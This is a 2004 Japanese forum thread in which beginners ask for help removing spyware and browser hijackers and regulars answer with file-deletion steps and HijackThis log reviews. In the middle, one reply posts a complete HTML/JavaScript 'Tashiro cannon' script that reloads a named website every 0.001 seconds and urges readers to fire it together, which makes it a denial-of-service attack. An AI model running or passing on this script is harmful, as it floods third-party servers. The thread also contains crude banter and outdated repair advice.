IFRAMEというタグなんだが、気付かぬ振りでレスする290に萌え 昨日は熱い討論で、今日はコントか 相変わらず分からん連中のスレだなw
しかし全員が強者回答者だぞ。
スパイウェア駆除なら俺達にまかせろ。
適当に煽るのは俺に任せろ
テンプレへの誘導係りは引き受けた。
>>298 これじゃダメだ あまいな
98はもうサポート外 きっぱりと言い切らなきゃ
イングラムもアホだが煽ってるヤツはクズだな。
>>298 外野が微妙に煽っているようなw
御託を並べて説得するよりも、放置したほうが良いじゃないか
あそこに比べると、ここは優し過ぎかな
無医村のくせに、お節介な名医が巡回して回答する変なスレですね。
こっちに誘導すれ
>>298 貞って新人回答者なのかな?初めて見るな。
>>298 削除された前スレがあるみたいだが
その状況では俺でもキレてるw
上げただけで、あそこまで罵倒できる 貞さんステキ♪
ヽ(`〜´)ノアブナイ!!ヽ(`〜´)ノアブナイ!!ヽ(`〜´)ノアブナイ!!ヽ(`〜´)ノアブナイ!!ヽ(`〜´)ノアブナイ!!
309 :
ひよこ名無しさん :04/08/31 08:44 ID:3Gdo+giN
Spybotでスキャンすると毎回絶対にdso exploitというのが5つ出てくるんですけど 別にほっといても問題ないんですか?
>>309 Spybotスレ見てくればいいじゃん。
311 :
:04/08/31 09:13 ID:1PIA73WJ
OSはwin2000、フラウザはIEです。
[症状]
・ホームが、
ttp://www.coolsearch.biz/ になってしまいました。
・毎時49分に、
ttp://fuck-teens-russia に飛ばされてしまう。
・ブラウザのみならずフォルダにも検索バー(同じものが2段))が現れた。
[対処]
「ようこそエロい人。」のスキエロテンプレ解決編の2(ウイルスのチェック)までやりました。
ホームのURLやSpybotでの検索(CoolWWWなんちゃら)から、
CWShredderでなんとかなるのかな思いました。
しかし、CWShreddeがDLできないんです。
右クリを使ってのファイルの保存ができない。(ブラウザ上では右クリがきかない)
左クリックをしてもDLが始まらないという状況です。
ファイルがおいてあるURLを直接Flashget(DLツール)にぶちこんでもおちてきません。
どうしたらよいか、どなたかご教授下さい。
>>313 それでもだめだったんです・・orz
でも、書き込みありがとうございます!!
>>314 上から三番目のから落とせました!
感謝します。
>>315 まったくしりませんでした。
ありがとうございます!
これからCWShredderをやってみます。
また何かありましたらその時はよろしくおねがいします!
漏れも先日やられたYO。DLしようとしてもエロサイトに飛ばされて出来ないんだよな〜。
うちのは98SEだったけど対処法として、Win.iniを開いて
load=
run=C:\WINDOWS\SYSTEM\SERVICES\MSXMIDI.EXE
となっているものを
load=
run=
に修復。それから以下のファイルを消去。
C:\WINDOWS\SYSTEM\SERVICES\MSXMIDI.EXE
C:\WINDOWS\QUESTMOD.DLL
C:\WINDOWS\SYSTEM\host32.exe
これでかなり良くなるんで、あとは再起動してホームページを元に戻してからIE起動、
http://higaitaisaku.web.infoseek.co.jp/removecws.html を参考にして除去。
>>318 URLのどこにも「avast」が入ってない地雷踏む馬鹿なんているのか?( ´,_ゝ`)
>>316 テンプレ全部やってから質問しる。
>>318 【embedタグで意味不明な文字羅列を呼び出しPCをフリーズさせ、
さらにobjectタグで「crash.html」と「crash2.html」を三回ほど呼び出す。
ループしてるから尚、性質が悪い。ソースを見るとなにかプラグインを呼び出して実行している様子。
ハードディスクアタックのスクリプトも入ってるので環境により有害[2004/08/30/
321 :
ひよこ名無しさん :04/08/31 10:36 ID:KZYFUJUy
「about:blank Search for型」の対処法で、 「Windowsをセーフモードで起動する」をやったのですが、 Windowsをセーフモードで起動するとマウスがきかなくなります。 「マウスをつないでください」みたいな警告もでます。 どうしたらいいでしょうか?
>>321 9x系でUSBマウスだから、セーフモードでは認識しない
>>321 Ctrl+Alt+Delで必要最低限のものを残して片っ端から終了させれば
擬似セーフモード。
CWShredderを使いました。 MSNMGSRI.EXE は削除してもよろしのですか?
>>325 だから全部テンプレ終わってから質問しろって。
中途半端な状態で終わらせるから訳わかんなくなるんだよ。
面倒くさいならリカバリしろ。
わかりました。 どうも。
test
329 :
ひよこ名無しさん :04/08/31 16:19 ID:C1MnxYQ/
330 :
ひよこ名無しさん :04/08/31 16:22 ID:C1MnxYQ/
フォルダの中身が表示されないようになってしまいました
331 :
ひよこ名無しさん :04/08/31 16:35 ID:ND0OGj+F
311の症状のうち上二つはどうにか直りました。 色々アドバイスを下さった方々、ほんとにありがとうございました! ただ、一番下の「ブラウザ・フォルダに検索バーが現れた」というのと ブラウザ上で右クリックが出来ないというのが直りません。 どなたかご教授よろしくです。 スレ違いでしたら誘導おねがいします。
>>332 テンプレを全部やっても治らないのなら
>>5 だな
全部終わってないのなら、先にそれを終わらせるべし
>>330 98はサポート外
IEが壊れているから、修復なり再インストールなりしなよ
その前にセーフモードで起動して、
インターネっト一時ファイルを削除
C:\WINDOWS\Downloaded Program Files この中のものを全部削除
C:\WINDOWS\TEMP この中のものを全部削除
セーフモードなら、エクスプローラーでフォルダの中が表示されると思う
95ならOKだ。
>>331 こんなしょぼいサイトで\15000だあ
ざけんのもいい加減にせい!
こんな金払ってる暇あんなら
アフリカ難民に寄付してやれ!
クッキーだけは消しといた方がいいかもな
339 :
ひよこ名無しさん :04/08/31 17:06 ID:C1MnxYQ/
祭りage
342 :
ひよこ名無しさん :04/08/31 18:58 ID:GMaca12C
・・・.jpg見たいな物を踏みました。 ウィルスやアプリケーションなるものが 勝手にダウンロードされて、それらを削除&駆除したのはいいんですけど 重要なもの(起動ファイル?)まで誤って削除してしまいました。 その影響からか、マウスがまったく使えず(矢印自体が表示されない状態) おまけに画面が少しぼやけた状態(拡大されてる感じ)になってしまいました. どうしたら、直るんでしょうか?
>>342 ∧ ∧ ┌───────────
( ´ー`) < シラネーヨ
\ < └─── /|───────
\.\______//
\ / ___
∪∪ ̄∪∪∧ ∧ <チラネーヨ
(´ー`)_/| ̄ ̄ ̄
UU UU
>>342 OSがXPとかMeならばシステムの復元を試してみれば治るんじゃねーかな
せめてOSぐらい書いてくれ
>>342 マウスが使えなくなった場合はキーボードを使います
347 :
65 :04/08/31 19:25 ID:OMjy50O8
昨日お世話になりました者ですが、
>>225 さんのおっしゃったようにウイルスバスターオンラインスキャンをやってみたところ、『トロイの木馬』型、モジアルとスモールという不正プログラムが検出されました。
トレンドマイクロの削除手段にあったレジストリキーを削除しようとしたのですが、該当のキーが見つかりません。
この場合、場所が違っていると考えたほうがいいのでしょうか?
また、その場合の対処方法等ありましたら教えて下さい。よろしくお願いします。
349 :
ひよこ名無しさん :04/08/31 19:30 ID:u/fTb/py
昨日の
>>65 さんと同じような症状になってしまい
テンプレに従い直してみたのですが
ネットをしているときに画面の右下の方に現れる変なマークが
常に「信頼済みサイト」というものになってしまいます。
インターネットオプションで設定し直してみても変なままです。
このままでも特に問題は無いのでしょうか?
OSはMeでIEを使っています。
>>347 該当のレジストリキーは、昨日もうHijackThisで削除したんだよ。
>>347 そういう時はレジストリ内をそのファイ名で検索するの
>>347 ファイルは削除できたのか?削除できたらもう一回スキャンしろ。
というか、フリーでもなんでもいいからアンチウィルスソフト入れろよ。
355 :
342 :04/08/31 19:49 ID:???
レス、サンクス あと、 ウインドウにツールバーに変なものがあります。 (エロサイトの影響かな・・・・) >343、344 すいません、テンプレを見てきます。 >345 W98SEです。 >346 使ってるんだけど、非常に不便です。 >348 今、食べてきました。
面白い人が来てる♪
357 :
◆RuMTryyIQQ :04/08/31 20:33 ID:qGeH+yT0
テンプレに書いてあることを試してみましたが効果がありません ホームページがabout;blankになってしまい、さらにネットをしていると 「Alredy running」と表示された後、[Hardcore TEEN SEX]というサイトに飛んでしまいます。 閉じると[Hardcore TEEN SEX]のショートカットがデスクトップに自動的にできてしまいます さらに、PC全体の動作も重くなりました。 WIN98です。よろしくお願いします
358 :
342 :04/08/31 20:46 ID:GMaca12C
テンプレに沿って「復元」試したら、表面上は直ったようです。(一応、ノートンを入れています。) こんな厨な質問にレスしてくれてありがとう。 あと、スレ汚しスマソ。
>>353 その人はノートン入れてる人だよ、ちゃんと過去ログ読め
>>358 表面上が治っても、テンプレは一応やっておく事をお奨めするよ。
症状が出る前にやっておけば、テンプレだけで治りやすい。
>>364 ミートゥー!
ゲ攻略板の住人か。。!!!1
というわけです。
>364 直リン乙。 つーことでリカバリしとけ、ゴルァ
367 :
364 :04/08/31 21:28 ID:???
ちょっと動転して、リンク直接貼っちゃいました。 このままにしておいたらだめですよね?
エロサイト見て寝転びながらチンコしごいてたら寝てしまい 起きたら姉や兄がいますた 俺はどう生きていけばいいですか 助けてください
369 :
364 :04/08/31 21:35 ID:???
誰もいねえのか???
370 :
364 :04/08/31 21:38 ID:EOn51Z18
>>369 >>365 の人?
とりあえず、心理的にかなりキツイんで
少し詳しく対処方法など教えてください
マルチなんて相手にしてくれないに決まってんだろアフォ
373 :
364 :04/08/31 21:47 ID:???
>>372 既出でしたか。
(´・ω・`)スミマセン。
ウツダ。
374 :
372 :04/08/31 21:50 ID:???
祭りage
376 :
かっつん :04/08/31 22:00 ID:Q4CDwLNU
はじめて投稿します。先日、友人からPCを譲ってもらいましたがスパイソフトが入っていると 言われたのでノートンアンチウイルス2004を購入してスキャンしましが、PCを起動すると自動的にURA-VIDEO エロ動画がダウンロードされてしまいます。とても困っていますので処理方法を教えて下さい。
378 :
364 :04/08/31 22:01 ID:???
>>374 誘導ありがとうございました^^
行ってみました。
安心できますたー。・゚・(ノД`)・゚・。
379 :
65 :04/08/31 22:03 ID:OMjy50O8
なんとかなりました! 有り難うございました。
キニシナイ事にしました。 ぼるじょあさん、ありがとう!
382 :
ひよこ名無しさん :04/08/31 22:22 ID:25gBAtSA
質問なんですがセーフモードでウィルスとかスパイウェアの 除去作業をしたら最後にレジストリの削除をしたりする作業がいらないのでしょうか?
>>382 別にセーフモードじゃなくても対応しているものはYes
だからテンプレを先やってくれと言う
HijackThisってのはレジストリだけFix(修復)する作業、だから後回し
385 :
エロサイトくれ :04/08/31 22:25 ID:DJw5X0Pu
387 :
386 :04/08/31 23:43 ID:F0DlfKge
すいません…386は自分です。 sageてしまって申し訳ないです…
>>387 (・3・) エェー 気にすんなYO つーかさっきのレスの時 確認でボクも踏んだけど
馬鹿馬鹿しくてヘソで茶沸かすYO
>>386 大丈夫。IP晒されたって たかが知れてる。
>>386 もう終わりです
ブラジルにでも逃亡して下さい
391 :
ひよこ名無しさん :04/08/31 23:53 ID:o1cElmjq
ADW_SOLU180.B SPYW_AGENT.A TROJ_DELF.AR これらのウイルスにかかってしまい、一度は全て削除できたのですが 一日経つと復活してしまいます。ウイルス総合スレでここのテンプレを実行するように 言われ、実行したのですがそれでも復活してしまいます。一体どうすればいいのでしょうか? OSはXP、バスター入れてます。
392 :
387 :04/08/31 23:54 ID:F0DlfKge
皆さんのアドバイスでなんとか落ち着きました。 本当にどうもありがとうございました。
>>391 具体的に、テンプレで何を実行したの?
ただ「実行したのですが」で何度騙されたことやら( ´_ゝ`)
395 :
391 :04/08/31 23:59 ID:o1cElmjq
それも実行して自動的に診断してくれるページで調べてもらいました。 ですが、それでもだめなのです。
>>395 そこまでやったならHijackThisログを貼ってみるよろし。щ(゚Д゚щ)カモォォォン
テンプレ実行してるか分かるね。
399 :
391 :04/09/01 00:29 ID:???
>>399 早く逃げないとボコボコにされちゃうよ。
>>399 ぬ?そんだけならすぐ終わりそうな予感。
セーフモードで駆除してもまだウィルスバスターで検出されるようならおいで。
つか、CWShredder+Spybot+Ad-awareSEは完璧かい?
>>399 怒らないから、おじちゃん達に本当の事教えて。
403 :
ひよこ名無しさん :04/09/01 01:04 ID:ijx6fJHv
ちょっと変なとこに入ってしまったらトロイやら色々引っかかって(ノートンでなんとかなりましたが) そのあとに勝手にモデムっぽいのがデスクトップに現れて とりあえず IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→ プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止) IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ してシステム復旧もして何事も無いようになってるんですが 何か注意点はあるでしょうか?OSはXpです。
405 :
ひよこ名無しさん :04/09/01 04:32 ID:G5UPChjT
About:blank なんですけど、やはり皆さんと同じようにホームがAbout:blankになってしまいます。 About:blankのソースをコピーしようとしても右クリック自体がAbout:blankではできません。 どのように対処すればよいでしょうか?
なんでゾヌやねん
409 :
パソコン初心者 :04/09/01 15:13 ID:4bVNaIhK
変なアイコン出てきて削除してもアイコン自体がショートカットなんでプログラムを削除できないんです。でプログラムの追加と削除ってマイコンピュータでだしても見当たらないんです。 助けてください。
>>409 右クリックしてプロパティ表示させたら、本体のリンク先がわかるだろうよ
このスレを一年間ロムれ
レジストリの登録も削除しないとな
何も仕組みがわからない人には難しい
411 :
パソコン初心者 :04/09/01 15:26 ID:4bVNaIhK
アダルトサイトに行ったらデスクトップに変なアイコンが出てきました。それを削除しようとしたら、そのアイコンがショートカットでプログラムを削除しなきゃいけないとでたので、削除しようとしたらそのアイコンのプログラムが見つかりません。どーしたらいいんでしょうか?
プログラムを削除すれば解決すると思ってるのかな。 そんなに甘くないと思うけど。
413 :
ひよこ名無しさん :04/09/01 15:32 ID:kokWggoO
ファイルやフォルダを開いたときに中に出てくるはずのアイコンが表示されません! テンプレはできる限りやりました。 OSはMeを使っています。 お助け下さい!
>>413 セーフモードなら、IEが壊れてても表示されるはずだが
415 :
mao :04/09/01 15:57 ID:Jgi9zRI3
今日インターネットを開いてみたら privacy Vuinerability Delacted(292 MPV Warning) と表示されてしまいます。OSはXPでブラウザはIE6です。 どうかお助け下さい。よろしくお願いします。
>>409 >>411 コントロールパネルの追加と削除に変なものがないかどうか
テンプレの各アンチウィルスソフト・アンチスパイウェアソフトで駆除できないか
つまりこれを要約すると、「テンプレ全部やれデブ」という事
>>413 「できる限り」やったというのはどういう意味?
テンプレにあるのは全部フリーソフトなんだけど。全部やってからもう一度来てね。
>>415 まずはテンプレをやってから助けを求めろ。
417 :
ここ :04/09/01 16:05 ID:4bVNaIhK
ADSLだと不当な請求(ダイヤルQ2など)はこないんですか?友達から聞いたんですけど。
419 :
mao :04/09/01 16:08 ID:Jgi9zRI3
>>415 返事ありがとうございます。まずテンプレ見て
できる限りがんばってみます。
掲示板に貼られていた
http://www.cat-e.be/member/index.php というアドレスを開くと、
いきなり自分のホスト名(?)が表示されてて、
貴方はこのサイトに登録したので、このホスト名から住所とか調べて
勤務先とかにも直接請求いたします〜〜
っていう感じの文章が書いてあったんです。
どうやら会員制のエロサイトみたいで、すごく焦っています。
どうすればいですか?
>>420 このスレッドでも何度も出てきてますが、無視すればいい。
422 :
420 :04/09/01 16:58 ID:Kr2cdDg1
すみません、sageになってました。 ついでに詳細の報告を少し。 そのエロサイトは、「請求する〜」という文章以外、別に普通のサイトでした。 ウィンドウが閉じれないとか、なにか勝手にインストールされるとか、 そういうのはありませんでした。 やはりこれはテンプレどおり、 リモートホストなどで住所を突き止められることは基本的に無理。なんでしょうか? 怖い・・・。
423 :
ひよこ名無しさん :04/09/01 16:59 ID:TaJBQfEy
PCを起動すると勝手にIEが開いてしまいます。 インターネット接続(ダイヤルアップ)が出来ていないので、 「ページを表示できません。」となるので被害は無いのですが、 気持ち悪いので直したいです。 アドレスは全く知らないところです。 一度勝手に開いたウインドウを閉じて、 もう一度IEを開けば問題無くホーム(yahoo)へ行けるんですけど。 これは>2のテンプレを実行すれば直りそうな事なのでしょうか? OSはWindows XPです。 問題あるのが友人のPCなのですぐにレスを返せそうに無いのですが、 よろしくお願いします。
>>420 メモ帳で保存したら、拡張子を.htmlに変更してみんなで田代砲を発射しましょう
<html><head><title>超田代砲改 Ver.1.2</title><FONT SIZE="4" COLOR="#000000">超田代砲改 Ver.1.2</FONT> <br> <br>
<script language="javascript"> <!--
var wind;
var add;
function display(){
add=address.value;wind=window.open(add,'san','WIDTH400,height=400');
tashiro();
}
function tashiro(){wind.location=add;
fired.value++;
setTimeout("tashiro();",inter.value*1000);}
// -->
</script> </head> <body>
目標アドレス:<br><input type="text" size=50 name=address value=
http://www.cat-e.be/member/index.php ><br><br>
発射間隔:<br><input type="text" size=5 name=inter value=0.001>秒<br><br>
既発射弾数:<br>
<input type="text" name=fired value=0><BR>
<input type=button value="発射" onClick="display();">
</body></html>
426 :
405 :04/09/01 17:05 ID:G5UPChjT
about;blankのソースですが、テンプレにコピーしてドクターにかけろと書いてあったところが見当たりません。 何度も手間かけて本当にすいません
>>423 スタートアップで何か変な登録はされてないか
スパイウェアが入っているのではないか
その辺を疑うのなら、
>>2 だけじゃなく
>>3 、
>>4 もやらなきゃ無意味
>>426 あなたのIEソースは他の誰にも見ることはできません。
何回見てもわからないなら、素直に復元なりリカバリした方が早いと思うよ。
429 :
405 :04/09/01 17:25 ID:???
>>429 <base href="res://%43%3a%5c%57%49%4e%44%4f%57%53%5c%53%59%53%54%45%4d%5c%50%4c%42%49%42%41%41%2e%44%4c%4c/">
思いっきり最初にあるじゃねーかボケ。ちゃんと見ろ。
432 :
405 :04/09/01 17:37 ID:???
初心者ツールにかけて、プロパティを見ようとしても、「指定されたファイルがありません」 ってなるんですけれど…すいません
>>432 何とか色々検索してみようとか言うのが面倒くさいなら、
システムの復元かリカバリした方がいいんじゃないかな。
その原因ファイルが見つからないんじゃ、話にも何もならないし。
434 :
405 :04/09/01 17:45 ID:???
リカバリの方法を教えてもらえますでしょうか?
>>434 リカバリーCDなら、メーカーの説明書読め
>>434 (・3・) エェー ルール守らない悪い子はむっしっし マニュアル読めYO
438 :
413 :04/09/01 17:53 ID:kokWggoO
システムの復元の窓は開くのですが、 中に何も表示されないままなので復元ができません。 セーフモードでも同じでした。 スタートボタンから始める以外に復元をする方法は無いでしょうか?
>>438 コマンドプロンプトで%systemroot%\system32\restore\rstrui.exeって打ってみろ禿
>>438 ぶっ壊れ
そんなもの直したって、何もいい事ねえよ
>>438 >>414 とか見た?他のテンプレはやった?めんどくさいから復元してるだけ?
復元もできないならリカバリすれば?(そっちの方がさらにめんどくさいけどな)
初心者がテンプレ見て惹かれる言葉は「復元」の二文字以外にあるわけないだろw
「助けて下さい」の人に近道なんてないんだけどな( ´Д`)y− テンプレやれっつってるのは、色々複合感染しまくってるからやれって事で。 近道で復元しようとかリカバリしようとか思う奴は、どうせまた同じのひっかかるだけ。 普通の人はそこまで末期症状になる前に対策を練る
>>443 しゃーないじゃん
リカバリするしかねえ程イカレてからここに来る椰子ばっかりなんだから
リカバリを否定する理由はどこにもないんだけどな。一番確実な選択。
(・3・) エェー Hijackthisのログ見て直してもらえた奴は そのときのログとっとけYO 同じこと起きたときに見比べて直せるだRO
スパイウェアと馬鹿はいつも二人三脚
>>446 その後にちゃんとアンチウィルスソフトも、テンプレにある3種の神器も、
転ばぬ先の杖も入れていればその通りなんだよね。
「助けて下さい」って来る人は、多分症状が治っただけで安心するから
そこでストップだろうなー、っていう先入観みたいなものがある。
だからリカバリだけして解決、ってだけじゃまた同じ事だよって事。
烈しくぶっ壊れちまっているのは、直した所でどうしようもない 後から不具合がぼろぼろと出まくるだろう 時間をかけてもどうせ恨まれるだけだ 直せるのは、セットアッププログラムがあるIEやOEやMPLAYERなどのレジストリ止まり IMEやエクスプローラーなどの不具合まで発展してしまっているのは、レジストリをもう正常に修正のしようがない 修復インストールが可能な人だけだ システムファイルならまだ、どうにでもなるけどね
こんなところで聞いていても解決せん リカバリするのが一番早い
そうだそうだ!回答者から楽しみを奪っちまえwwWW
∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ・∀・)< こんなとこで聞くよりリカバリした方が早いよ!無駄無駄! ( 建前 ) \_______________ | | | __(__)_)______________ ( _)_) | | | ( 本音 ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( 。A。)< 他の回答者さえいなくなれば俺が回答できて(゚Д゚)ウマー ∨ ̄∨ \_______________
454 :
ひよこ名無しさん :04/09/01 22:32 ID:2ABLw9W+
>>405 と同じ症状になったけど、これもリカバリすれば解決できますか?
456 :
ひよこ名無しさん :04/09/01 23:01 ID:HFjurAyE
何時の間にやらパコバリスレになっとる…
ぐへへへへへへへへへ・・・・・・・質問待ってるぞ。
質問です。 お前ら何様のつもりですか?
質問です。 リカバリって何?食えんの?
質問です。 カネをください。
462 :
391 :04/09/01 23:35 ID:???
夏休みが終わったらちゃんと寝ろ
464 :
391 :04/09/01 23:38 ID:???
あと、スパイウエアが復活すると 「C:\temp〜〜〜.exe」が見つかりませんと警告が出ます
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | マスター、今夜も賑わってるね♪ レヽ___________________ ∧_∧ ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ・∀) / ̄ヽ (´∀` ) < お店の雰囲気が変わったモナ ( `つ 日 凸 ( つ つヽ \________________ (_ ⌒./ 凵ヽ | | | |ヽ.凸| | 「 (_/Y ヽ _(__) | |\| | ┗┳━| ̄ ̄ ̄ ̄ ̄| .. \|. │ | ┻\| .| \.| │
>>464 そのパスでレジストリ内を検索して削除するんだ
467 :
391 :04/09/01 23:43 ID:???
検索してみましたがありませんでした
>>467 tempファイルはすべて削除しても問題無いから、検索してすべてのtempファイルを削除してみる。
470 :
391 :04/09/01 23:54 ID:???
ログとはhijackthisのログですか?
471 :
391 :04/09/01 23:58 ID:???
Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\System32\pctspk.exe C:\Program Files\LiquidView\lviewj.exe C:\Program Files\Analog Devices\SoundMAX\SMTray.exe C:\Progra~1\Necmfk\necmfk.exe C:\Program Files\SmartHobby\PlugIn\MovieWriter\PlugPlayDetect.exe C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe
472 :
391 :04/09/01 23:58 ID:???
C:\Program Files\Winad Client\Winad.exe C:\WINDOWS\System32\ctfmon.exe C:\Program Files\SmartHobby\PlugIn\CopyFromDigitalCamera\SearchM.exe C:\Program Files\Winad Client\WinClt.exe C:\Program Files\GTAgent\AUAgent.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\Softnavi\SNWebStart.exe C:\Program Files\Softnavi\SNaviBTN.exe C:\Program Files\tool\Win_Exit_Button_205\WExitBtn.exe C:\Program Files\仮想画面マネージャ\仮想画面マネージャ.exe C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\WINDOWS\system32\nmftskss.exe C:\WINDOWS\system32\NTMETER.EXE C:\WINDOWS\System32\nvsvc32.exe C:\Smdata\ReadSctService.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Trend Micro\Virus Buster 2004\Tmntsrv.exe C:\Program Files\Trend Micro\Virus Buster 2004\tmproxy.exe C:\Program Files\Trend Micro\Virus Buster 2004\PccPfw.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\User\My Documents\スパイウェア対策ソフト\hijackthis\HijackThis.exe
473 :
391 :04/09/01 23:59 ID:???
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\Downlo~1\CNSMIN~1.DLL (file missing) O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file) O3 - Toolbar: BBS &Toolbar - {78D663D2-97F1-4A09-BD41-B75CB6989211} - C:\Program Files\BBS Toolbar\BbsBar2.dll O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe O4 - HKLM\..\Run: [UpdateManager] "C:\Program Files\Common Files\Sonic\Update Manager\sgtray.exe" /r O4 - HKLM\..\Run: [LiquidView] C:\Program Files\LiquidView\lviewj.exe O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
474 :
391 :04/09/02 00:00 ID:???
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32 O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC O4 - HKLM\..\Run: [NECMFK] C:\Progra~1\Necmfk\necmfk.exe O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe" O4 - HKLM\..\Run: [PCClient.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe" O4 - HKLM\..\Run: [TM Outbreak Agent] "C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe" /run O4 - HKLM\..\Run: [WinHandAutoClean] "C:\Program Files\Madonote\AUTOCLN.EXE" O4 - HKLM\..\Run: [Winad Client] C:\Program Files\Winad Client\Winad.exe O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\Run: [SearchM] C:\Program Files\SmartHobby\PlugIn\CopyFromDigitalCamera\SearchM.exe O4 - HKCU\..\Run: [121ポップリンク] "C:\Program Files\GTAgent\AUAgent.exe" /startup O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - Startup: ウインドウズ終了ボタン.lnk O4 - Startup: 仮想画面マネージャ.lnk = ?
475 :
391 :04/09/02 00:00 ID:???
O4 - Global Startup: インターネットを楽しもうスターター.lnk = ? O4 - Global Startup: ソフトナビゲータースターター.lnk = ? O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar3.dll/cmsearch.html O8 - Extra context menu item: Groyaでリンク先を開く - C:\groya\groya1.htm O8 - Extra context menu item: Groyaで選択範囲を開く - C:\groya\groya1.htm O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Save Flash - res://C:\Program Files\UnH Solutions\Flash Saving Plugin\FlashSButton.dll/210 O8 - Extra context menu item: WeBoXでこのページを取り込む(&1) - C:\Documents and Settings\User\デスクトップ\webox0.97R\webox_dl.html O8 - Extra context menu item: WeBoXで全てのリンクを取り込む(&2) - C:\Documents and Settings\User\デスクトップ\webox0.97R\webox_all.html O8 - Extra context menu item: WeBoXで選択範囲を取り込む(&3) - C:\Documents and Settings\User\デスクトップ\webox0.97R\webox_sel.html O8 - Extra context menu item: このページのキャッシュ - res://c:\program files\google\GoogleToolbar3.dll/cmcache.html O8 - Extra context menu item: ブラクラチェッカー - C:\WINDOWS\WEB\bcchk.htm O8 - Extra context menu item: リンク元 - res://c:\program files\google\GoogleToolbar3.dll/cmbacklinks.html O8 - Extra context menu item: 右クリックランチャー(&K) - C:\Program Files\rlaunch\rlaunch.htt O8 - Extra context menu item: 最小ウィンドウでリンク先を開く - C:\groya\groya3.htm O8 - Extra context menu item: 最小ウィンドウで選択範囲を開く - C:\groya\groya3.htm O8 - Extra context menu item: 選択範囲から動画URL抽出 - C:\groya\groya4.htm
476 :
391 :04/09/02 00:01 ID:???
O8 - Extra context menu item: 関連ページ - res://c:\program files\google\GoogleToolbar3.dll/cmsimilar.html
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Flash - {43CF38F3-5AEC-45a3-AD31-04EB06E9C6CA} - (no file) (HKCU)
